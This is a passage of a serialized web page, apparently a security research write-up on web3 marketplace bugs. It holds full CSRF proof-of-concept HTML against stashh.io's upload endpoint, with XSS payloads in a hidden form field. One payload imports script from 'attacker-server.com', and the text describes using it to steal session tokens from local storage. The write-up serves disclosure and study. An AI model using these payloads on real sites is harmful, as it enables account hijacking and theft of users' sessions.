le":359},[38924],{"type":30,"value":377},{"type":24,"tag":301,"props":38926,"children":38927},{"style":329},[38928],{"type":30,"value":38929},"'ether'",{"type":24,"tag":301,"props":38931,"children":38932},{"style":359},[38933],{"type":30,"value":9381},{"type":24,"tag":301,"props":38935,"children":38936},{"class":303,"line":4668},[38937,38941,38946],{"type":24,"tag":301,"props":38938,"children":38939},{"style":359},[38940],{"type":30,"value":38870},{"type":24,"tag":301,"props":38942,"children":38943},{"style":314},[38944],{"type":30,"value":38945},"encodeABI",{"type":24,"tag":301,"props":38947,"children":38948},{"style":359},[38949],{"type":30,"value":10318},{"type":24,"tag":301,"props":38951,"children":38952},{"class":303,"line":4677},[38953],{"type":24,"tag":301,"props":38954,"children":38955},{"style":359},[38956],{"type":30,"value":15732},{"type":24,"tag":301,"props":38958,"children":38959},{"class":303,"line":4697},[38960],{"type":24,"tag":301,"props":38961,"children":38962},{"emptyLinePlaceholder":16},[38963],{"type":30,"value":341},{"type":24,"tag":301,"props":38965,"children":38966},{"class":303,"line":4725},[38967,38972,38976,38980,38984,38989,38993,38998],{"type":24,"tag":301,"props":38968,"children":38969},{"style":369},[38970],{"type":30,"value":38971}," web3",{"type":24,"tag":301,"props":38973,"children":38974},{"style":359},[38975],{"type":30,"value":206},{"type":24,"tag":301,"props":38977,"children":38978},{"style":369},[38979],{"type":30,"value":38751},{"type":24,"tag":301,"props":38981,"children":38982},{"style":359},[38983],{"type":30,"value":206},{"type":24,"tag":301,"props":38985,"children":38986},{"style":314},[38987],{"type":30,"value":38988},"sendTransaction",{"type":24,"tag":301,"props":38990,"children":38991},{"style":359},[38992],{"type":30,"value":362},{"type":24,"tag":301,"props":38994,"children":38995},{"style":369},[38996],{"type":30,"value":38997},"transactionObject",{"type":24,"tag":301,"props":38999,"children":39000},{"style":359},[39001],{"type":30,"value":589},{"type":24,"tag":301,"props":39003,"children":39004},{"class":303,"line":4733},[39005],{"type":24,"tag":301,"props":39006,"children":39007},{"style":359},[39008],{"type":30,"value":39009}," });\n",{"type":24,"tag":301,"props":39011,"children":39012},{"class":303,"line":4741},[39013],{"type":24,"tag":301,"props":39014,"children":39015},{"style":359},[39016],{"type":30,"value":6918},{"type":24,"tag":301,"props":39018,"children":39019},{"class":303,"line":4757},[39020],{"type":24,"tag":301,"props":39021,"children":39022},{"style":359},[39023],{"type":30,"value":698},{"type":24,"tag":301,"props":39025,"children":39026},{"class":303,"line":4765},[39027],{"type":24,"tag":301,"props":39028,"children":39029},{"emptyLinePlaceholder":16},[39030],{"type":30,"value":341},{"type":24,"tag":301,"props":39032,"children":39033},{"class":303,"line":4773},[39034,39038,39042,39047],{"type":24,"tag":301,"props":39035,"children":39036},{"style":348},[39037],{"type":30,"value":26255},{"type":24,"tag":301,"props":39039,"children":39040},{"style":359},[39041],{"type":30,"value":362},{"type":24,"tag":301,"props":39043,"children":39044},{"style":329},[39045],{"type":30,"value":39046},"'https://cdn.jsdelivr.net/gh/ethereum/web3.js@1.0.0-beta.36/dist/web3.min.js'",{"type":24,"tag":301,"props":39048,"children":39049},{"style":359},[39050],{"type":30,"value":589},{"type":24,"tag":301,"props":39052,"children":39053},{"class":303,"line":4781},[39054,39059,39063,39067,39071,39076],{"type":24,"tag":301,"props":39055,"children":39056},{"style":314},[39057],{"type":30,"value":39058},"setTimeout",{"type":24,"tag":301,"props":39060,"children":39061},{"style":359},[39062],{"type":30,"value":362},{"type":24,"tag":301,"props":39064,"children":39065},{"style":369},[39066],{"type":30,"value":38247},{"type":24,"tag":301,"props":39068,"children":39069},{"style":359},[39070],{"type":30,"value":377},{"type":24,"tag":301,"props":39072,"children":39073},{"style":466},[39074],{"type":30,"value":39075},"1e3",{"type":24,"tag":301,"props":39077,"children":39078},{"style":359},[39079],{"type":30,"value":589},{"type":24,"tag":32,"props":39081,"children":39082},{},[39083,39088],{"type":24,"tag":60,"props":39084,"children":39085},{},[39086],{"type":30,"value":39087},"CSRF & XSS",{"type":30,"value":39089},"\nWe continued our investigation of potential XSS vulnerabilities by exploring various sinks, such as common field errors and the handling of file uploads in different marketplaces.",{"type":24,"tag":32,"props":39091,"children":39092},{},[39093,39095,39100],{"type":30,"value":39094},"Our attention was drawn to ",{"type":24,"tag":188,"props":39096,"children":39098},{"href":38036,"rel":39097},[192],[39099],{"type":30,"value":38040},{"type":30,"value":39101},", an online platform that allows users to upload images. During the image uploading process, we noticed that certain parameters were being sent in the request, as shown below:",{"type":24,"tag":32,"props":39103,"children":39104},{},[39105],{"type":24,"tag":177,"props":39106,"children":39108},{"alt":7,"src":39107},"/posts/web2-bug-repellant-instructions/csrf.png",[],{"type":24,"tag":32,"props":39110,"children":39111},{},[39112],{"type":30,"value":39113},"and here there is the code:",{"type":24,"tag":291,"props":39115,"children":39117},{"className":38119,"code":39116,"language":38121,"meta":7,"style":7},"\u003Chtml>\n \u003Cbody>\n \u003Cscript>history.pushState('', '', '/')\u003C/script>\n \u003Cform id=\"form123\" action=\"https://stashh.io/upload_asset\" method=\"POST\" enctype=\"multipart/form-data\" value=\"asd\">\n \u003Cinput type=\"file\" name=\"data\" id=\"file123\">\n \u003Cinput type=\"hidden\" name=\"config\" value=\"{"address":"secret1k6tng55v0zgufpcx8wa2w33asl82fhx84tn3hq<img/src=x onerror=alert(document.domain)>","to":"profile-assets","type":"icon"}\" />\n \u003Cinput type=\"submit\" value=\"Submit request\" />\n \u003C/form>\n \u003C/body>\n\n \u003Cscript>\n\n (async ()=>{\n const blob = await (await fetch(\"/sapo.png\")).blob()\n\n let f = new File([blob], 'sapo.png', {type: 'image/png'})\n const dataTransfer = new DataTransfer();\n dataTransfer.items.add(f);\n\n file123.files = dataTransfer.files;\n })()\n\n \u003C/script>\n\u003C/html>\n",[39118],{"type":24,"tag":145,"props":39119,"children":39120},{"__ignoreMap":7},[39121,39138,39155,39189,39275,39332,39530,39571,39587,39603,39610,39625,39632,39644,39703,39710,39773,39802,39840,39847,39885,39898,39905,39920],{"type":24,"tag":301,"props":39122,"children":39123},{"class":303,"line":304},[39124,39129,39134],{"type":24,"tag":301,"props":39125,"children":39127},{"style":39126},"--shiki-default:#808080",[39128],{"type":30,"value":1849},{"type":24,"tag":301,"props":39130,"children":39131},{"style":348},[39132],{"type":30,"value":39133},"html",{"type":24,"tag":301,"props":39135,"children":39136},{"style":39126},[39137],{"type":30,"value":12812},{"type":24,"tag":301,"props":39139,"children":39140},{"class":303,"line":320},[39141,39146,39151],{"type":24,"tag":301,"props":39142,"children":39143},{"style":39126},[39144],{"type":30,"value":39145}," \u003C",{"type":24,"tag":301,"props":39147,"children":39148},{"style":348},[39149],{"type":30,"value":39150},"body",{"type":24,"tag":301,"props":39152,"children":39153},{"style":39126},[39154],{"type":30,"value":12812},{"type":24,"tag":301,"props":39156,"children":39157},{"class":303,"line":335},[39158,39162,39167,39171,39176,39181,39185],{"type":24,"tag":301,"props":39159,"children":39160},{"style":39126},[39161],{"type":30,"value":39145},{"type":24,"tag":301,"props":39163,"children":39164},{"style":348},[39165],{"type":30,"value":39166},"script",{"type":24,"tag":301,"props":39168,"children":39169},{"style":39126},[39170],{"type":30,"value":1456},{"type":24,"tag":301,"props":39172,"children":39173},{"style":359},[39174],{"type":30,"value":39175},"history.pushState('', '', '/')",{"type":24,"tag":301,"props":39177,"children":39178},{"style":39126},[39179],{"type":30,"value":39180},"\u003C/",{"type":24,"tag":301,"props":39182,"children":39183},{"style":348},[39184],{"type":30,"value":39166},{"type":24,"tag":301,"props":39186,"children":39187},{"style":39126},[39188],{"type":30,"value":12812},{"type":24,"tag":301,"props":39190,"children":39191},{"class":303,"line":344},[39192,39197,39202,39207,39211,39216,39221,39225,39230,39234,39238,39243,39248,39252,39257,39262,39266,39271],{"type":24,"tag":301,"props":39193,"children":39194},{"style":39126},[39195],{"type":30,"value":39196}," \u003C",{"type":24,"tag":301,"props":39198,"children":39199},{"style":348},[39200],{"type":30,"value":39201},"form",{"type":24,"tag":301,"props":39203,"children":39204},{"style":369},[39205],{"type":30,"value":39206}," id",{"type":24,"tag":301,"props":39208,"children":39209},{"style":385},[39210],{"type":30,"value":523},{"type":24,"tag":301,"props":39212,"children":39213},{"style":329},[39214],{"type":30,"value":39215},"\"form123\"",{"type":24,"tag":301,"props":39217,"children":39218},{"style":369},[39219],{"type":30,"value":39220}," action",{"type":24,"tag":301,"props":39222,"children":39223},{"style":385},[39224],{"type":30,"value":523},{"type":24,"tag":301,"props":39226,"children":39227},{"style":329},[39228],{"type":30,"value":39229},"\"https://stashh.io/upload_asset\"",{"type":24,"tag":301,"props":39231,"children":39232},{"style":369},[39233],{"type":30,"value":23890},{"type":24,"tag":301,"props":39235,"children":39236},{"style":385},[39237],{"type":30,"value":523},{"type":24,"tag":301,"props":39239,"children":39240},{"style":329},[39241],{"type":30,"value":39242},"\"POST\"",{"type":24,"tag":301,"props":39244,"children":39245},{"style":369},[39246],{"type":30,"value":39247}," enctype",{"type":24,"tag":301,"props":39249,"children":39250},{"style":385},[39251],{"type":30,"value":523},{"type":24,"tag":301,"props":39253,"children":39254},{"style":329},[39255],{"type":30,"value":39256},"\"multipart/form-data\"",{"type":24,"tag":301,"props":39258,"children":39259},{"style":369},[39260],{"type":30,"value":39261}," value",{"type":24,"tag":301,"props":39263,"children":39264},{"style":385},[39265],{"type":30,"value":523},{"type":24,"tag":301,"props":39267,"children":39268},{"style":329},[39269],{"type":30,"value":39270},"\"asd\"",{"type":24,"tag":301,"props":39272,"children":39273},{"style":39126},[39274],{"type":30,"value":12812},{"type":24,"tag":301,"props":39276,"children":39277},{"class":303,"line":401},[39278,39283,39287,39292,39296,39301,39306,39310,39315,39319,39323,39328],{"type":24,"tag":301,"props":39279,"children":39280},{"style":39126},[39281],{"type":30,"value":39282}," \u003C",{"type":24,"tag":301,"props":39284,"children":39285},{"style":348},[39286],{"type":30,"value":15181},{"type":24,"tag":301,"props":39288,"children":39289},{"style":369},[39290],{"type":30,"value":39291}," type",{"type":24,"tag":301,"props":39293,"children":39294},{"style":385},[39295],{"type":30,"value":523},{"type":24,"tag":301,"props":39297,"children":39298},{"style":329},[39299],{"type":30,"value":39300},"\"file\"",{"type":24,"tag":301,"props":39302,"children":39303},{"style":369},[39304],{"type":30,"value":39305}," name",{"type":24,"tag":301,"props":39307,"children":39308},{"style":385},[39309],{"type":30,"value":523},{"type":24,"tag":301,"props":39311,"children":39312},{"style":329},[39313],{"type":30,"value":39314},"\"data\"",{"type":24,"tag":301,"props":39316,"children":39317},{"style":369},[39318],{"type":30,"value":39206},{"type":24,"tag":301,"props":39320,"children":39321},{"style":385},[39322],{"type":30,"value":523},{"type":24,"tag":301,"props":39324,"children":39325},{"style":329},[39326],{"type":30,"value":39327},"\"file123\"",{"type":24,"tag":301,"props":39329,"children":39330},{"style":39126},[39331],{"type":30,"value":12812},{"type":24,"tag":301,"props":39333,"children":39334},{"class":303,"line":415},[39335,39340,39344,39348,39352,39357,39361,39365,39370,39374,39378,39382,39387,39392,39397,39402,39407,39411,39416,39421,39426,39430,39435,39440,39444,39449,39454,39459,39464,39469,39474,39479,39483,39488,39493,39498,39503,39507,39511,39516,39521,39525],{"type":24,"tag":301,"props":39336,"children":39337},{"style":39126},[39338],{"type":30,"value":39339}," \u003C",{"type":24,"tag":301,"props":39341,"children":39342},{"style":348},[39343],{"type":30,"value":15181},{"type":24,"tag":301,"props":39345,"children":39346},{"style":369},[39347],{"type":30,"value":39291},{"type":24,"tag":301,"props":39349,"children":39350},{"style":385},[39351],{"type":30,"value":523},{"type":24,"tag":301,"props":39353,"children":39354},{"style":329},[39355],{"type":30,"value":39356},"\"hidden\"",{"type":24,"tag":301,"props":39358,"children":39359},{"style":369},[39360],{"type":30,"value":39305},{"type":24,"tag":301,"props":39362,"children":39363},{"style":385},[39364],{"type":30,"value":523},{"type":24,"tag":301,"props":39366,"children":39367},{"style":329},[39368],{"type":30,"value":39369},"\"config\"",{"type":24,"tag":301,"props":39371,"children":39372},{"style":369},[39373],{"type":30,"value":39261},{"type":24,"tag":301,"props":39375,"children":39376},{"style":385},[39377],{"type":30,"value":523},{"type":24,"tag":301,"props":39379,"children":39380},{"style":329},[39381],{"type":30,"value":9408},{"type":24,"tag":301,"props":39383,"children":39384},{"style":348},[39385],{"type":30,"value":39386},"{"",{"type":24,"tag":301,"props":39388,"children":39389},{"style":329},[39390],{"type":30,"value":39391},"address",{"type":24,"tag":301,"props":39393,"children":39394},{"style":348},[39395],{"type":30,"value":39396},"":"",{"type":24,"tag":301,"props":39398,"children":39399},{"style":329},[39400],{"type":30,"value":39401},"secret1k6tng55v0zgufpcx8wa2w33asl82fhx84tn3hq",{"type":24,"tag":301,"props":39403,"children":39404},{"style":348},[39405],{"type":30,"value":39406},"<",{"type":24,"tag":301,"props":39408,"children":39409},{"style":329},[39410],{"type":30,"value":177},{"type":24,"tag":301,"props":39412,"children":39413},{"style":348},[39414],{"type":30,"value":39415},"/",{"type":24,"tag":301,"props":39417,"children":39418},{"style":329},[39419],{"type":30,"value":39420},"src",{"type":24,"tag":301,"props":39422,"children":39423},{"style":348},[39424],{"type":30,"value":39425},"=",{"type":24,"tag":301,"props":39427,"children":39428},{"style":329},[39429],{"type":30,"value":26050},{"type":24,"tag":301,"props":39431,"children":39432},{"style":348},[39433],{"type":30,"value":39434}," ",{"type":24,"tag":301,"props":39436,"children":39437},{"style":329},[39438],{"type":30,"value":39439},"onerror",{"type":24,"tag":301,"props":39441,"children":39442},{"style":348},[39443],{"type":30,"value":39425},{"type":24,"tag":301,"props":39445,"children":39446},{"style":329},[39447],{"type":30,"value":39448},"alert",{"type":24,"tag":301,"props":39450,"children":39451},{"style":348},[39452],{"type":30,"value":39453},"(",{"type":24,"tag":301,"props":39455,"children":39456},{"style":329},[39457],{"type":30,"value":39458},"document",{"type":24,"tag":301,"props":39460,"children":39461},{"style":348},[39462],{"type":30,"value":39463},".",{"type":24,"tag":301,"props":39465,"children":39466},{"style":329},[39467],{"type":30,"value":39468},"domain",{"type":24,"tag":301,"props":39470,"children":39471},{"style":348},[39472],{"type":30,"value":39473},")>","",{"type":24,"tag":301,"props":39475,"children":39476},{"style":329},[39477],{"type":30,"value":39478},"to",{"type":24,"tag":301,"props":39480,"children":39481},{"style":348},[39482],{"type":30,"value":39396},{"type":24,"tag":301,"props":39484,"children":39485},{"style":329},[39486],{"type":30,"value":39487},"profile",{"type":24,"tag":301,"props":39489,"children":39490},{"style":348},[39491],{"type":30,"value":39492},"-",{"type":24,"tag":301,"props":39494,"children":39495},{"style":329},[39496],{"type":30,"value":39497},"assets",{"type":24,"tag":301,"props":39499,"children":39500},{"style":348},[39501],{"type":30,"value":39502},"","",{"type":24,"tag":301,"props":39504,"children":39505},{"style":329},[39506],{"type":30,"value":7026},{"type":24,"tag":301,"props":39508,"children":39509},{"style":348},[39510],{"type":30,"value":39396},{"type":24,"tag":301,"props":39512,"children":39513},{"style":329},[39514],{"type":30,"value":39515},"icon",{"type":24,"tag":301,"props":39517,"children":39518},{"style":348},[39519],{"type":30,"value":39520},""}",{"type":24,"tag":301,"props":39522,"children":39523},{"style":329},[39524],{"type":30,"value":9408},{"type":24,"tag":301,"props":39526,"children":39527},{"style":39126},[39528],{"type":30,"value":39529}," />\n",{"type":24,"tag":301,"props":39531,"children":39532},{"class":303,"line":439},[39533,39537,39541,39545,39549,39554,39558,39562,39567],{"type":24,"tag":301,"props":39534,"children":39535},{"style":39126},[39536],{"type":30,"value":39339},{"type":24,"tag":301,"props":39538,"children":39539},{"style":348},[39540],{"type":30,"value":15181},{"type":24,"tag":301,"props":39542,"children":39543},{"style":369},[39544],{"type":30,"value":39291},{"type":24,"tag":301,"props":39546,"children":39547},{"style":385},[39548],{"type":30,"value":523},{"type":24,"tag":301,"props":39550,"children":39551},{"style":329},[39552],{"type":30,"value":39553},"\"submit\"",{"type":24,"tag":301,"props":39555,"children":39556},{"style":369},[39557],{"type":30,"value":39261},{"type":24,"tag":301,"props":39559,"children":39560},{"style":385},[39561],{"type":30,"value":523},{"type":24,"tag":301,"props":39563,"children":39564},{"style":329},[39565],{"type":30,"value":39566},"\"Submit request\"",{"type":24,"tag":301,"props":39568,"children":39569},{"style":39126},[39570],{"type":30,"value":39529},{"type":24,"tag":301,"props":39572,"children":39573},{"class":303,"line":447},[39574,39579,39583],{"type":24,"tag":301,"props":39575,"children":39576},{"style":39126},[39577],{"type":30,"value":39578}," \u003C/",{"type":24,"tag":301,"props":39580,"children":39581},{"style":348},[39582],{"type":30,"value":39201},{"type":24,"tag":301,"props":39584,"children":39585},{"style":39126},[39586],{"type":30,"value":12812},{"type":24,"tag":301,"props":39588,"children":39589},{"class":303,"line":476},[39590,39595,39599],{"type":24,"tag":301,"props":39591,"children":39592},{"style":39126},[39593],{"type":30,"value":39594}," \u003C/",{"type":24,"tag":301,"props":39596,"children":39597},{"style":348},[39598],{"type":30,"value":39150},{"type":24,"tag":301,"props":39600,"children":39601},{"style":39126},[39602],{"type":30,"value":12812},{"type":24,"tag":301,"props":39604,"children":39605},{"class":303,"line":495},[39606],{"type":24,"tag":301,"props":39607,"children":39608},{"emptyLinePlaceholder":16},[39609],{"type":30,"value":341},{"type":24,"tag":301,"props":39611,"children":39612},{"class":303,"line":504},[39613,39617,39621],{"type":24,"tag":301,"props":39614,"children":39615},{"style":39126},[39616],{"type":30,"value":39145},{"type":24,"tag":301,"props":39618,"children":39619},{"style":348},[39620],{"type":30,"value":39166},{"type":24,"tag":301,"props":39622,"children":39623},{"style":39126},[39624],{"type":30,"value":12812},{"type":24,"tag":301,"props":39626,"children":39627},{"class":303,"line":512},[39628],{"type":24,"tag":301,"props":39629,"children":39630},{"emptyLinePlaceholder":16},[39631],{"type":30,"value":341},{"type":24,"tag":301,"props":39633,"children":39634},{"class":303,"line":592},[39635,39640],{"type":24,"tag":301,"props":39636,"children":39637},{"style":359},[39638],{"type":30,"value":39639}," (async ()=>",{"type":24,"tag":301,"props":39641,"children":39642},{"style":348},[39643],{"type":30,"value":799},{"type":24,"tag":301,"props":39645,"children":39646},{"class":303,"line":619},[39647,39652,39657,39662,39667,39671,39675,39680,39684,39689,39694,39699],{"type":24,"tag":301,"props":39648,"children":39649},{"style":369},[39650],{"type":30,"value":39651}," const",{"type":24,"tag":301,"props":39653,"children":39654},{"style":369},[39655],{"type":30,"value":39656}," blob",{"type":24,"tag":301,"props":39658,"children":39659},{"style":385},[39660],{"type":30,"value":39661}," = ",{"type":24,"tag":301,"props":39663,"children":39664},{"style":308},[39665],{"type":30,"value":39666},"await",{"type":24,"tag":301,"props":39668,"children":39669},{"style":385},[39670],{"type":30,"value":873},{"type":24,"tag":301,"props":39672,"children":39673},{"style":308},[39674],{"type":30,"value":39666},{"type":24,"tag":301,"props":39676,"children":39677},{"style":314},[39678],{"type":30,"value":39679}," fetch",{"type":24,"tag":301,"props":39681,"children":39682},{"style":385},[39683],{"type":30,"value":362},{"type":24,"tag":301,"props":39685,"children":39686},{"style":329},[39687],{"type":30,"value":39688},"\"/sapo.png\"",{"type":24,"tag":301,"props":39690,"children":39691},{"style":385},[39692],{"type":30,"value":39693},")).",{"type":24,"tag":301,"props":39695,"children":39696},{"style":314},[39697],{"type":30,"value":39698},"blob",{"type":24,"tag":301,"props":39700,"children":39701},{"style":385},[39702],{"type":30,"value":14551},{"type":24,"tag":301,"props":39704,"children":39705},{"class":303,"line":635},[39706],{"type":24,"tag":301,"props":39707,"children":39708},{"emptyLinePlaceholder":16},[39709],{"type":30,"value":341},{"type":24,"tag":301,"props":39711,"children":39712},{"class":303,"line":643},[39713,39717,39722,39726,39730,39735,39740,39744,39748,39753,39758,39763,39768],{"type":24,"tag":301,"props":39714,"children":39715},{"style":369},[39716],{"type":30,"value":9900},{"type":24,"tag":301,"props":39718,"children":39719},{"style":369},[39720],{"type":30,"value":39721}," f",{"type":24,"tag":301,"props":39723,"children":39724},{"style":385},[39725],{"type":30,"value":39661},{"type":24,"tag":301,"props":39727,"children":39728},{"style":348},[39729],{"type":30,"value":21913},{"type":24,"tag":301,"props":39731,"children":39732},{"style":314},[39733],{"type":30,"value":39734}," File",{"type":24,"tag":301,"props":39736,"children":39737},{"style":385},[39738],{"type":30,"value":39739},"([",{"type":24,"tag":301,"props":39741,"children":39742},{"style":369},[39743],{"type":30,"value":39698},{"type":24,"tag":301,"props":39745,"children":39746},{"style":385},[39747],{"type":30,"value":551},{"type":24,"tag":301,"props":39749,"children":39750},{"style":329},[39751],{"type":30,"value":39752},"'sapo.png'",{"type":24,"tag":301,"props":39754,"children":39755},{"style":385},[39756],{"type":30,"value":39757},", {",{"type":24,"tag":301,"props":39759,"children":39760},{"style":369},[39761],{"type":30,"value":39762},"type:",{"type":24,"tag":301,"props":39764,"children":39765},{"style":329},[39766],{"type":30,"value":39767}," 'image/png'",{"type":24,"tag":301,"props":39769,"children":39770},{"style":385},[39771],{"type":30,"value":39772},"})\n",{"type":24,"tag":301,"props":39774,"children":39775},{"class":303,"line":652},[39776,39780,39785,39789,39793,39798],{"type":24,"tag":301,"props":39777,"children":39778},{"style":369},[39779],{"type":30,"value":39651},{"type":24,"tag":301,"props":39781,"children":39782},{"style":369},[39783],{"type":30,"value":39784}," dataTransfer",{"type":24,"tag":301,"props":39786,"children":39787},{"style":385},[39788],{"type":30,"value":39661},{"type":24,"tag":301,"props":39790,"children":39791},{"style":348},[39792],{"type":30,"value":21913},{"type":24,"tag":301,"props":39794,"children":39795},{"style":314},[39796],{"type":30,"value":39797}," DataTransfer",{"type":24,"tag":301,"props":39799,"children":39800},{"style":385},[39801],{"type":30,"value":4859},{"type":24,"tag":301,"props":39803,"children":39804},{"class":303,"line":666},[39805,39810,39814,39819,39823,39827,39831,39836],{"type":24,"tag":301,"props":39806,"children":39807},{"style":369},[39808],{"type":30,"value":39809}," dataTransfer",{"type":24,"tag":301,"props":39811,"children":39812},{"style":385},[39813],{"type":30,"value":206},{"type":24,"tag":301,"props":39815,"children":39816},{"style":369},[39817],{"type":30,"value":39818},"items",{"type":24,"tag":301,"props":39820,"children":39821},{"style":385},[39822],{"type":30,"value":206},{"type":24,"tag":301,"props":39824,"children":39825},{"style":314},[39826],{"type":30,"value":16443},{"type":24,"tag":301,"props":39828,"children":39829},{"style":385},[39830],{"type":30,"value":362},{"type":24,"tag":301,"props":39832,"children":39833},{"style":369},[39834],{"type":30,"value":39835},"f",{"type":24,"tag":301,"props":39837,"children":39838},{"style":385},[39839],{"type":30,"value":589},{"type":24,"tag":301,"props":39841,"children":39842},{"class":303,"line":674},[39843],{"type":24,"tag":301,"props":39844,"children":39845},{"emptyLinePlaceholder":16},[39846],{"type":30,"value":341},{"type":24,"tag":301,"props":39848,"children":39849},{"class":303,"line":692},[39850,39855,39859,39864,39868,39873,39877,39881],{"type":24,"tag":301,"props":39851,"children":39852},{"style":369},[39853],{"type":30,"value":39854}," file123",{"type":24,"tag":301,"props":39856,"children":39857},{"style":385},[39858],{"type":30,"value":206},{"type":24,"tag":301,"props":39860,"children":39861},{"style":369},[39862],{"type":30,"value":39863},"files",{"type":24,"tag":301,"props":39865,"children":39866},{"style":385},[39867],{"type":30,"value":39661},{"type":24,"tag":301,"props":39869,"children":39870},{"style":369},[39871],{"type":30,"value":39872},"dataTransfer",{"type":24,"tag":301,"props":39874,"children":39875},{"style":385},[39876],{"type":30,"value":206},{"type":24,"tag":301,"props":39878,"children":39879},{"style":369},[39880],{"type":30,"value":39863},{"type":24,"tag":301,"props":39882,"children":39883},{"style":385},[39884],{"type":30,"value":492},{"type":24,"tag":301,"props":39886,"children":39887},{"class":303,"line":3631},[39888,39893],{"type":24,"tag":301,"props":39889,"children":39890},{"style":348},[39891],{"type":30,"value":39892}," }",{"type":24,"tag":301,"props":39894,"children":39895},{"style":359},[39896],{"type":30,"value":39897},")()\n",{"type":24,"tag":301,"props":39899,"children":39900},{"class":303,"line":3639},[39901],{"type":24,"tag":301,"props":39902,"children":39903},{"emptyLinePlaceholder":16},[39904],{"type":30,"value":341},{"type":24,"tag":301,"props":39906,"children":39907},{"class":303,"line":3647},[39908,39912,39916],{"type":24,"tag":301,"props":39909,"children":39910},{"style":39126},[39911],{"type":30,"value":39594},{"type":24,"tag":301,"props":39913,"children":39914},{"style":348},[39915],{"type":30,"value":39166},{"type":24,"tag":301,"props":39917,"children":39918},{"style":39126},[39919],{"type":30,"value":12812},{"type":24,"tag":301,"props":39921,"children":39922},{"class":303,"line":3685},[39923,39927,39931],{"type":24,"tag":301,"props":39924,"children":39925},{"style":39126},[39926],{"type":30,"value":39180},{"type":24,"tag":301,"props":39928,"children":39929},{"style":348},[39930],{"type":30,"value":39133},{"type":24,"tag":301,"props":39932,"children":39933},{"style":39126},[39934],{"type":30,"value":12812},{"type":24,"tag":32,"props":39936,"children":39937},{},[39938],{"type":30,"value":39939},"When playing around with the application, we discovered that if an invalid address was submitted, the user's input would be reflected directly inside the response, another possible XSS vulnerability.",{"type":24,"tag":32,"props":39941,"children":39942},{},[39943],{"type":30,"value":39944},"However, since the request was a POST request, we initially thought this was only a self-XSS.",{"type":24,"tag":32,"props":39946,"children":39947},{},[39948],{"type":30,"value":39949},"In an effort to increase the impact of the above vulnerability, we discovered a way to leverage Cross-Site Request Forgery (CSRF) to manipulate the user's browser into sending a forced request that contained our XSS payload.",{"type":24,"tag":32,"props":39951,"children":39952},{},[39953],{"type":30,"value":39954},"From here, we were able to steal the session cookie from local storage.",{"type":24,"tag":291,"props":39956,"children":39958},{"className":38119,"code":39957,"language":38121,"meta":7,"style":7},"\u003Chtml>\n \u003Cbody>\n \u003Cscript>history.pushState('', '', '/')\u003C/script>\n \u003Cform id=\"form123\" action=\"https://stashh.io/upload_asset\" method=\"POST\" enctype=\"multipart/form-data\" value=\"asd\">\n \u003Cinput type=\"file\" name=\"data\" id=\"file123\">\n \u003Cinput type=\"hidden\" name=\"config\" value=\"{"address":"<img/src=x onerror=import(`https://attacker-server.com/leak.js`)>","to":"profile-assets","type":"icon"}\" />\n \u003Cinput type=\"submit\" value=\"Submit request\" />\n \u003C/form>\n \u003C/body>\n\n \u003Cscript>\n\n (async ()=>{\n const blob = await (await fetch(\"/sapo.png\")).blob()\n\n let f = new File([blob], 'sapo.png', {type: 'image/png'})\n const dataTransfer = new DataTransfer();\n dataTransfer.items.add(f);\n\n file123.files = dataTransfer.files;\n\n form123.submit()\n })()\n\n \u003C/script>\n\u003C/html>\n",[39959],{"type":24,"tag":145,"props":39960,"children":39961},{"__ignoreMap":7},[39962,39977,39992,40023,40098,40149,40337,40376,40391,40406,40413,40428,40435,40446,40497,40504,40559,40586,40621,40628,40663,40670,40691,40702,40709,40724],{"type":24,"tag":301,"props":39963,"children":39964},{"class":303,"line":304},[39965,39969,39973],{"type":24,"tag":301,"props":39966,"children":39967},{"style":39126},[39968],{"type":30,"value":1849},{"type":24,"tag":301,"props":39970,"children":39971},{"style":348},[39972],{"type":30,"value":39133},{"type":24,"tag":301,"props":39974,"children":39975},{"style":39126},[39976],{"type":30,"value":12812},{"type":24,"tag":301,"props":39978,"children":39979},{"class":303,"line":320},[39980,39984,39988],{"type":24,"tag":301,"props":39981,"children":39982},{"style":39126},[39983],{"type":30,"value":39145},{"type":24,"tag":301,"props":39985,"children":39986},{"style":348},[39987],{"type":30,"value":39150},{"type":24,"tag":301,"props":39989,"children":39990},{"style":39126},[39991],{"type":30,"value":12812},{"type":24,"tag":301,"props":39993,"children":39994},{"class":303,"line":335},[39995,39999,40003,40007,40011,40015,40019],{"type":24,"tag":301,"props":39996,"children":39997},{"style":39126},[39998],{"type":30,"value":39145},{"type":24,"tag":301,"props":40000,"children":40001},{"style":348},[40002],{"type":30,"value":39166},{"type":24,"tag":301,"props":40004,"children":40005},{"style":39126},[40006],{"type":30,"value":1456},{"type":24,"tag":301,"props":40008,"children":40009},{"style":359},[40010],{"type":30,"value":39175},{"type":24,"tag":301,"props":40012,"children":40013},{"style":39126},[40014],{"type":30,"value":39180},{"type":24,"tag":301,"props":40016,"children":40017},{"style":348},[40018],{"type":30,"value":39166},{"type":24,"tag":301,"props":40020,"children":40021},{"style":39126},[40022],{"type":30,"value":12812},{"type":24,"tag":301,"props":40024,"children":40025},{"class":303,"line":344},[40026,40030,40034,40038,40042,40046,40050,40054,40058,40062,40066,40070,40074,40078,40082,40086,40090,40094],{"type":24,"tag":301,"props":40027,"children":40028},{"style":39126},[40029],{"type":30,"value":39196},{"type":24,"tag":301,"props":40031,"children":40032},{"style":348},[40033],{"type":30,"value":39201},{"type":24,"tag":301,"props":40035,"children":40036},{"style":369},[40037],{"type":30,"value":39206},{"type":24,"tag":301,"props":40039,"children":40040},{"style":385},[40041],{"type":30,"value":523},{"type":24,"tag":301,"props":40043,"children":40044},{"style":329},[40045],{"type":30,"value":39215},{"type":24,"tag":301,"props":40047,"children":40048},{"style":369},[40049],{"type":30,"value":39220},{"type":24,"tag":301,"props":40051,"children":40052},{"style":385},[40053],{"type":30,"value":523},{"type":24,"tag":301,"props":40055,"children":40056},{"style":329},[40057],{"type":30,"value":39229},{"type":24,"tag":301,"props":40059,"children":40060},{"style":369},[40061],{"type":30,"value":23890},{"type":24,"tag":301,"props":40063,"children":40064},{"style":385},[40065],{"type":30,"value":523},{"type":24,"tag":301,"props":40067,"children":40068},{"style":329},[40069],{"type":30,"value":39242},{"type":24,"tag":301,"props":40071,"children":40072},{"style":369},[40073],{"type":30,"value":39247},{"type":24,"tag":301,"props":40075,"children":40076},{"style":385},[40077],{"type":30,"value":523},{"type":24,"tag":301,"props":40079,"children":40080},{"style":329},[40081],{"type":30,"value":39256},{"type":24,"tag":301,"props":40083,"children":40084},{"style":369},[40085],{"type":30,"value":39261},{"type":24,"tag":301,"props":40087,"children":40088},{"style"